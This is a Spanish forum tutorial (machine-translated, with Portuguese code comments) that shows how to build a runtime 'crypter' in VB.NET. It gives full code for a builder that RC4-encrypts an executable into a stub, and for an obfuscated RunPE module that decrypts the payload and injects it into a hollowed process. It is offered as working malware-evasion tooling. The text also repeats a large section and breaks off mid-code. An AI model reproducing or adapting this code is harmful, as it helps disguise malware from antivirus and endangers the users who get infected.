![[es][tuto]crypter runtime vb.net by queda Seguri12](https://i.servimg.com/u/f44/16/74/27/23/seguri12.jpg)
[es][tuto]crypter runtime vb.net by queda
:: Entrada
Página 1 de 1.
[es][tuto]crypter runtime vb.net by queda
Queda de Faraó Mar Mar 13, 2012 1:50 pm
buenas chicas, esta situación va a enseñar, hacer un crypter con RunPE y efecto splash en vb.2008 este estado y se dedica dekoders oversec.
necesidad de construir los primeros dos formularios, uno para el cliente a otro splash
Form1--cliente
Form2--Splash
vamos a poner manos a la obra y hacer que el cliente, primero debe crear un cuadro de texto y dos botones.
lo hicieron en el código mediante la adición a la parte superior
[PHP]Imports System.Text[/PHP]
[PHP]Const Jod_Separador = "@_Jod_@"[/PHP]
agregar el componente OpenFileDialog
en el evento click del botón 1 agregue el siguiente código:
[PHP]'----------------Abertura do Arquivo a ser encriptado------------
OpenFileDialog1.FileName = ""
OpenFileDialog1.Filter = "Exe(*.exe)|*.exe"
OpenFileDialog1.ShowDialog()
TextFile.Text = OpenFileDialog1.FileName[/PHP]
En el evento click del botón 2 vamos a añadir dos declaraciones de variables:
[PHP] '--------------Declarações das variaveis---------------------
Dim Jod_Aberturabin As String
Dim Jod_Modulo_Princi As String
Dim Jod_Separador As String = "@_Jod_@"
Dim Jod_nomeArq As String[/PHP]
en el evento click del botón 2 agregue el siguiente código:
[PHP] '----------------Proteçãao do arquivo---------------------
If Jod_salvar.ShowDialog = Windows.Forms.DialogResult.OK Then
Jod_nomeArq = Jod_salvar.FileName
Else : Exit Sub
End If
Jod_salvar.Filter = "Executáveis (*.exe)|*.exe"
'-----------------------------------------------------------[/PHP]
continuar con el botón dos, vamos a abrir los archivos binarios:
[PHP]FileOpen(1, TextFile.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
Jod_Aberturabin = Space(LOF(1))
FileGet(1, Jod_Aberturabin)
FileClose(1)
'-------------------------------------------------------------
FileOpen(1, Application.StartupPath & "\stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
Jod_Modulo_Princi = Space(LOF(1))
FileGet(1, Jod_Modulo_Princi)
FileClose(1)
'------------------------------------------------------------
FileOpen(1, Jod_nomeArq, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, Jod_Modulo_Princi & Jod_Separador & rc4(Jod_Aberturabin, "Jodkeyencript"))
FileClose(1)[/PHP]
después de agregar el módulo de cifrado RC4 que fue elegido:
[PHP]Public Shared Function rc4(ByVal message As String, ByVal password As String) As String
Dim i As Integer = 0 'pega daqui
Dim j As Integer = 0
Dim cipher As New StringBuilder
Dim returnCipher As String = String.Empty
Dim sbox As Integer() = New Integer(256) {}
Dim key As Integer() = New Integer(256) {}
Dim intLength As Integer = password.Length
Dim a As Integer = 0
While a <= 255
Dim ctmp As Char = (password.Substring((a Mod intLength), 1).ToCharArray()(0))
key(a) = Microsoft.VisualBasic.Strings.Asc(ctmp)
sbox(a) = a
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While
Dim x As Integer = 0
Dim b As Integer = 0
While b <= 255
x = (x + sbox(b) + key(b)) Mod 256
Dim tempSwap As Integer = sbox(b)
sbox(b) = sbox(x)
sbox(x) = tempSwap
System.Math.Max(System.Threading.Interlocked.Increment(b), b - 1)
End While
a = 1
While a <= message.Length
Dim itmp As Integer = 0
i = (i + 1) Mod 256
j = (j + sbox(i)) Mod 256
itmp = sbox(i)
sbox(i) = sbox(j)
sbox(j) = itmp
Dim k As Integer = sbox((sbox(i) + sbox(j)) Mod 256)
Dim ctmp As Char = message.Substring(a - 1, 1).ToCharArray()(0)
itmp = Asc(ctmp)
Dim cipherby As Integer = itmp Xor k
cipher.Append(Chr(cipherby))
System.Math.Max(System.Threading.Interlocked.Increment(a), a - 1)
End While
returnCipher = cipher.ToString
cipher.Length = 0
Return returnCipher
End Function
[/PHP]
listo concluir la estructura del cliente, ahora vamos a hacer splash:
oversec.org/showthread.php?1107-ES-Creating-a-splash-scren-in-effect
Pasamos ahora a la evolución del talón, cree un nuevo proyecto y en el formulario, agregue el siguiente código:
[PHP]
Me.Visible = False
Me.Hide()
'---------Separador-----------------
Dim Jod_Form_seperador As String = "@_Jod_@"
Dim Jod_Capt_Prc As String
Jod_Capt_Prc = Process.GetCurrentProcess().MainModule.FileName
Dim Jod_Ptc As String = System.IO.Path.GetTempPath
Dim Jod_Arq_Leitor, Jod_Pega_Geral(), Jod_Para_cry As String
'------------------------------------
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
Jod_Arq_Leitor = Space(LOF(1))
FileGet(1, Jod_Arq_Leitor)
FileClose(1)
'--------------------------------------
Jod_Pega_Geral = Split(Jod_Arq_Leitor, Jod_Form_seperador)
Jod_Para_cry = iRvFqeDEfJ(Jod_Pega_Geral(1), "Jodkeyencript")
Dim Jod_Convert_Bytes() As Byte
Jod_Convert_Bytes = Encoding.Default.GetBytes(Jod_Para_cry)
Try
S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0.Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(Jod_Convert_Bytes, Jod_Capt_Prc)
Catch ex As Exception
End Try
FileOpen(5, Jod_Ptc & "\Jodhsghgsjhks.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(5, Jod_Para_cry)
FileClose(5)
Me.Close()[/PHP]
Ahora cree un nuevo módulo RunPE
[PHP]Imports System.ComponentModel
Imports System.Runtime.InteropServices
Public Class S8PZDu2KuIb3BJklLe07417x1xC1YMziPiasKvQIrnBBw0
Public Const SDnNle9g5VF2VbJGGZlWNjH8OJ9Wcjyw9HYEPDliWtCnf9 As Long = &H200
Public Const SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt As Long = &H40
Public Const S7MFd3CpqpMqb2C0vP4pbzNH0tPv9tgbwrgJwOm8ymYHSn As Long = &H80
Public Const S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A As Long = &H20
Public Const SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM As Long = &H10
Public Const SJf1ylUN6liDLXTU4ZfL3A2X53qOFXCvSGJCxTKR9t33GL As Long = &H8
Public Const Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So As Long = &H1
Public Const SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb As Long = &H4
Public Const SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC As UInt32 = &H2
Shared Sub Svw9sqoPG6CKtlfYCBvd8KrDu1R3mgDhjEZQVdoK0WkLO6(ByVal SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq() As Byte, ByVal ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg As String)
Dim SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF As S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh = New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6
Dim SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY = GCHandle.Alloc(SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, GCHandleType.Pinned)
Dim SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F As Integer = SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject.ToInt32
Dim SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k
SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT = Marshal.PtrToStructure(SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.AddrOfPinnedObject, SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.GetType)
SvrdP60QQywO19O7TrfSDmkoW6snfDEtbrK2hbE5V2ZGyY.Free()
If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.CreateProcess(Nothing, ShYwJpy4unfs7c6mnMlNFphQjkbkoEOTCuT0ClWljMoZDg, SQ5i5PWpMKeEWK4YQJdhMHoTP0xbYWHprgPXdU7CXOljXM, SFVDwvuVUMyfwmQzmL7DU8hEokW5gBOGZ4NU5M1qiVdYhh, False, 4, Nothing, Nothing, SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU, SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC) = 0 Then Return
Dim SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu As New S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh
SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address), SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.GetType)
Dim S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B As Long, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7 As UInteger
SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU.CB = Len(SWDeobqxHZdRQoCWZ4CpvV2kztkOaUG16Q8lq28TduocgU)
SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Flags = 65538
If SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Signature <> 17744 Or SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Magic <> 23117 Then Return
If S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.GetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK) And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ReadProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au, 4, 0) >= 0 And S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ZwUnmapViewOfSection(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au) >= 0 Then
Dim ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW As UInt32 = S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualAllocEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Image, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SImage, 12288, 4)
If ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW <> 0 Then
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW, SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq, SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.SHeaders, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B = SKYVqeAegCWJezILkXRMhn4XDYw48pPCb7clRRTGNtZLDT.Address + 248
For SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 As Integer = 0 To SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.File.Sections - 1
S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF = Marshal.PtrToStructure(New IntPtr(SOo8uPYNpzxT30G8CU7YVDjv9NDf1cymhK9dezPXIhwy8F + SnEOi5ykf4pGGkX0dfZVuNk9ue52LQ8od51lSPMb84oE3B + SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1 * 40), S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.GetType)
Dim Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size) As Byte
For S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt As Integer = 0 To S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size - 1 : Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5(S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) = SFGyEY5M8j47x9yQJxEUPGaO4uC5GClIoFUdIBFpOuNZuq(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Pointer + S47PeNv6nR2xfPBHk7u863fqE9VOxzvBP1Cboxy0AZjEYt) : Next
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, Sr2fxZ3l67LhfVvFueNubWDi2Z4BGoNGJAqsJYwIALeyk5, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Size, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.VirtualProtectEx(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Address, S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Misc.Size, SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(S1SFxNgoVdxcRESBzXWJxfIBwNLGQetPTZNeP58NHVoLEF.Flags), S1MUP2NOpD7Mh2cXwgTR0yJBrtUpdMkpHaUCmuded6c9au)
Next SHNKQEdZSAw2h8XPHAzaquV7M8gOTpKuB09MHjx8kKwBK1
Dim Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv = BitConverter.GetBytes(ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.WriteProcessMemory(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Process, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Ebx + 8, Se5s5zUAUwVcpnw8N3nmSCmo3xEKyy9N2p5VelTK5buKSv, 4, S0o2gvBM754j2QftGNRsszvNOyDtV6Jhq3Ovyv8MrS2fK7)
SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK.Eax = ShYn0tuGSIQHUAzM3kepDlVfuSiwMVAxmx4zf0CTrnM8SW + SgAwpqj30zVaVTeJbCPQhdER2Pvop32CEMLWruBHuErmeu.Optional.Address
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.SetThreadContext(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread, SSZvkRN4Yo4ZiffpneLEsLaCfHJ5Eo0uB6BVhoXeodoyRK)
S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ.ResumeThread(SwusBZwfOOWBcBXIF1G2xjhShofAwN1J99IBLMn1xHajYC.Thread)
End If
End If
End Sub
Private Shared Function Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(ByVal Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH As Long, ByVal SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F As Long) As Long
Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6 = S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(Su6xorYZ6zeyBDnj1xxnn77esalzwTwaAp97HyqdF30NSH) / (2 ^ SzAv7NUQoba1mdyKKqXESJewqUB1ummt2cScimKHJjer7F)
End Function
Private Shared Function S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v(ByVal S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t As Long) As Double
Const SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc = 4294967296.0#
If S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t < 0 Then
S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t + SLibZgPFyQDT9yiJsoJVye2QIhokDCv3IXUMQOUh9Ou7dc
Else : S4FJgey6pmCGr5n6rEaif7nhNgKOwk5zes6s4RA0ISNZ5v = S5YS4LaM9keBTJgQlaUrcNCPM1gacO1PPnieY2gPVjhk1t
End If
End Function
Private Shared Function SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh(ByVal SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ As Long) As Long
Dim SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w() As Object = {Sp0njTpLZJE67gDChJuA4ADf2691f80VUfJn88R4aWE8So, SqWvPtIAyDq09oVD4QbaFsaYgYYNhCcTRzD1yE7IqjB3eM, SWHaDXx6Is3P6Umaq1V9Mt0PQ5kEwPTDOCR4PQurbyhzwC, _
S8UwTvdniLlzaVHcof88obKaNGjsdIx8nXS0nUqxj6bF7A, SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt, _
SLtUNMlL3Jy8imKDM4u6xJVI6Rn3lQwEGxwzoaCDjhTcHb, SaYmgYuaT7fI4vICHQ0aI2dsHOSDXRwyMQqzXYgzxE0pRt}
SDSvNPJTVM3ERxiymEohuJ2ZHeqm0qiylJ3KS90Gw4ZBEh = SMEGk7Mg3WHwoI8cKEwGxOIhpxLHI7VUcx74YSmLHrKF3w(Su8W5VOcv8RmmSZ5aNpw2YU7cRdx0qu6Hwe2uwmvGftvV6(SInHjtU3MPJ5jwYyupq06CXiG4cdl6ljEumL1Foe76l7HZ, 29))
End Function
<EditorBrowsable(1)> Friend Class S4XNT9qtK77SuhFfrv62newV8ODqoTUjRjqDt3QO1uv2ZZ
<StructLayout(0)> Structure Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY
Dim Flags, D0, D1, D2, D3, D6, D7 As UInt32, Save As SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd
Dim SG, SF, SE, SD, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SC, EFlags, Esp, SS As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim Registers As Byte()
End Structure
<StructLayout(0)> Structure SXnfNlXvaZ87psouU9Y8b9SY4rmqevvh7O80FTT1PxOYYd
Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()
Dim State As UInt32
End Structure
Structure SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N
Dim Address, Size As UInt32
End Structure
Structure SxMiUJGkVI1UJNunKNBXy2ewOBHBj09svrQG1GbMzExccp
Dim Name As Byte, Misc As SKuENpyDwomcaF6AxbZP9HLI8447xqkmK4We86uN3MmI3N, Address, Size, Pointer, PRelocations, PLines, NRelocations, NLines, Flags As UInt32
End Structure
Structure Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR
Dim Process, Thread As IntPtr, ProcessId, ThreadId As Integer
End Structure
<StructLayout(0, CharSet:=3)> Structure SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU
Dim CB As Integer, ReservedA, Desktop, Title As String, X, Y, XSize, YSize, XCount, YCount, Fill, Flags As Integer
Dim ShowWindow, ReservedB As Short, ReservedC, Input, Output, [Error] As Integer
End Structure
<StructLayout(0)> Structure SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6
Dim Length As Integer, Descriptor As IntPtr, Inherit As Integer
End Structure
<StructLayout(0)> Structure S0DR8Hpycij4oSlQzPbuoj9BmRt1faQeLe8foBpkA4hj6k
Dim Magic, Last, Pages, Relocations, Size, Minimum, Maximum, SS, SP, Checksum, IP, CS, Table, Overlay As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim ReservedA As UInt16()
Dim ID, Info As UInt16
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim ReservedB As UInt16()
Dim Address As Int32
End Structure
Structure Si5GfMaX3RPwVG0oWXAC2Jxaint6HSXRPlg7WLWol5SrWh
Dim Signature As UInt32, File As Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw, [Optional] As SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q
End Structure
<StructLayout(0)> Structure Spu6bRVFYadojTZnCpt4vl96FfuTLEp5NajhyXZlowkzhw
Dim Machine, Sections As UInt16, Stamp, Table, Symbols As UInt32, Size, Flags As UInt16
End Structure
<StructLayout(0)> Structure SAf35JCPd3QZv4m16HsLPFa6O4dw1htie0tFlnekL7mi6Q
Public Magic As UInt16, Major, Minor As Byte, SCode, IData, UData, Address, Code, Data, Image As UInt32, SectionA, FileA As UInt32
Public MajorO, MinorO, MajorI, MinorI, MajorS, MinorS As UInt16, Version, SImage, SHeaders, Checksum As UInt32, Subsystem, Flags As UInt16
Public SSReserve, SSCommit, SHReserve, SHCommit, LFlags, Count As UInt32
<MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public DataDirectory As SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7()
End Structure
<StructLayout(0)> Structure SnO4BhHOkoPjrpS3QLpWYb3Eev4WCM7pDCdtpG0w4DMnp7
Dim Address, Size As UInt32
End Structure
Declare Auto Function CreateProcess Lib "kernel32" (ByVal Jodgsgusname As String, ByVal Jodhjgsjhgsjcommand As String, ByRef process As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByRef thread As SP3Z2dY5mI0NIjDI1yTlfFfqMYPrHvypyWxRiGB7xh8NU6, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As SqZGNARhIZnMibeavQFQO4LAOI0wQeVxavGL774vAIcgYU, <Out()> ByRef info As Szty5KKyS9pkyn6iSYQBtOCJYSWpfmSK3PeDMN3kEvbrYR) As Boolean
Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVCal Jodsgfsfprocess As IntPtr, ByVal Jodhmjhxkhaddress As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean
Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer
Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer
Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr
Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long
Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32
Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean
Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As Sg6muJO6UW1fnUaIl6zZpzsz4DzFOvKZyoXX5Js7VHiCtY) As Boolean
End Class
End Class[/PHP]
Bueno, llegamos a la conclusión del crypter
necesidad de construir los primeros dos formularios, uno para el cliente a otro splash
Form1--cliente
Form2--Splash
vamos a poner manos a la obra y hacer que el cliente, primero debe crear un cuadro de texto y dos botones.
lo hicieron en el código mediante la adición a la parte superior
[PHP]Imports System.Text[/PHP]
[PHP]Const Jod_Separador = "@_Jod_@"[/PHP]
agregar el componente OpenFileDialog
en el evento click del botón 1 agregue el siguiente código:
[PHP]'----------------Abertura do Arquivo a ser encriptado------------
OpenFileDialog1.FileName = ""
OpenFileDialog1.Filter = "Exe(*.exe)|*.exe"
OpenFileDialog1.ShowDialog()
TextFile.Text = OpenFileDialog1.FileName[/PHP]
En el evento click del botón 2 vamos a añadir dos declaraciones de variables:
[PHP] '--------------Declarações das variaveis---------------------
Dim Jod_Aberturabin As String
Dim Jod_Modulo_Princi As String
Dim Jod_Separador As String = "@_Jod_@"
Dim Jod_nomeArq As String[/PHP]
en el evento click del botón 2 agregue el siguiente código:
[PHP] '----------------Proteçãao do arquivo---------------------
If Jod_salvar.ShowDialog = Windows.Forms.DialogResult.OK Then
Jod_nomeArq = Jod_salvar.FileName
Else : Exit Sub
End If
Jod_salvar.Filter = "Executáveis (*.exe)|*.exe"
'-----------------------------------------------------------[/PHP]
continuar con el botón dos, vamos a abrir los archivos binarios:
[PHP]FileOpen(1, TextFile.Text, OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
Jod_Aberturabin = Space(LOF(1))
FileGet(1, Jod_Aberturabin)
FileClose(1)
'-------------------------------------------------------------
FileOpen(1, Application.StartupPath & "\stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
Jod_Modulo_Princi = Space(LOF(1))
FileGet(1, Jod_Modulo_Princi)
FileClose(1)
'------------------------------------------------------------
FileOpen(1, Jod_nomeArq, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, Jod_Modulo_Princi & Jod_Separador & rc4(Jod_Aberturabin, "Jodkeyencript"))
